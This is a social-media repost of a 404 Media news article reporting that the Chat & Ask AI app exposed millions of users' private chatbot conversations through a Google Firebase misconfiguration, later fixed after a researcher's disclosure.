Β»Massive AI Chat App Leaked Millions of Users Private Conversations:
Chat & Ask AI, which claims 50 million users, exposed private chats about suicide and making meth.Β«
On the one hand, I don't understand the people who use it, but on the other hand, a company that people don't care about because people are a product.
π 404media.co/massive-ai-chat-apβ¦
#AIchat #ai #noai #leaks #suicide #meth #app #leaked #privacycheck #users #meth #ProductPeople
Massive AI Chat App Leaked Millions of Users Private Conversations
Chat & Ask AI, one of the most popular AI apps on the Google Play and Apple App stores that claims more than 50 million users, left hundreds of millions of those usersβ private messages with the appβs chatbot exposed, according to an independent security researcher and emails viewed by 404 Media. The exposed chats showed users asked the app βHow do I painlessly kill myself,β to write suicide notes, βhow to make meth,β and how to hack various apps.The exposed data was discovered by an independent security researcher who goes by Harry. The issue is a misconfiguration in the appβs usage of the mobile app development platform Google Firebase, which by default makes it easy for anyone to make themselves an βauthenticatedβ user who can access the appβs backend storage where in many instances user data is stored. Harry said that he had access to 300 million messages from more than 25 million users in the exposed database, and that he extracted and analyzed a sample of 60,000 users and a million messages. The database contained user files with a complete history of their chats with the AI, timestamps of those chats, the name they gave the appβs chatbot, how they configured the model, and which specific model they used. Chat & Ask AI is a βwrapperβ that plugs into various large language models from bigger companies users can choose from, Including OpenAIβs ChatGPT, Anthropic's Claude, and Googleβs Gemini.
While the exposed data is a reminder of the kind of data users are potentially revealing about themselves when they talk to LLMs, the sample data itself also reveals some of the darker interactions users have with AI.
βGive me a 2 page essay on how to make meth in a world where it was legalized for medical use,β one user wrote.
βI want to kill myself what is the best way,β another user wrote.
Recent reporting has also shown that messages with AI chatbots are not always idle chatter. Weβve seen one case where a chatbot encouraged a teenager not to seek help for his suicidal thoughts. Chatbots have been linked to multiple suicides, and studies have revealed that chatbots will often answer βhigh riskβ questions about suicide.
Chat & Ask AI is made by Turkish developer Codeway. It has more than 10 million downloads on the Google Play store and 318,000 ratings on the Apple App store. On LinkedIn, the company claims it has more than 300 employees who work in Istanbul and Barcelona.
βWe take your data protection seriouslyβwith SSL certification, GDPR compliance, and ISO standards, we deliver enterprise-grade security trusted by global organizations,β Chat & Ask AIβs site says.
Harry disclosed the vulnerability to Codeway on January 20. It exposed data of not just Chat & Ask AI users, but users of other popular apps developed by Codeway. The company fixed the issue across all of its apps within hours, according to Harry.
The Google Firebase misconfiguration issue that exposed Chat & Ask AI user data has been known and discussed by security researchers for years, and is still common today. Harry says his research isnβt novel, but it now quantifies the problem. He created a tool that automatically scans the Google Play and Apple App stores for this vulnerability and found that 103 out of 200 iOS apps he scanned had this issue, cumulatively exposing tens millions of stored files.
Dan Guido, CEO of the cybersecurity research and consulting firm Trail of Bits, told me in an email that this Firebase misconfiguration issue is βa well known weaknessβ and easy to find. He recently noted on X that Trail of Bits was able to make a tool with Claude to scan for this vulnerability in just 30 minutes.
Harry also created a site where users can see the apps he found that suffer from this issue. If a developer reaches out to Harry and fixes the issue, Harry says he removes them from the site, which is why Codewayβs apps are no longer listed there.
Codeway did not respond to a request for comment.
ChatGPT Encouraged Suicidal Teen Not To Seek Help, Lawsuit Claims
As reported by the New York Times, a new complaint from the parents of a teen who died by suicide outlines the conversations he had with the chatbot in the months leading up to his death.Samantha Cole (404 Media)
Ramin Honary likes this.
πππππβππ‘ππ reshared this.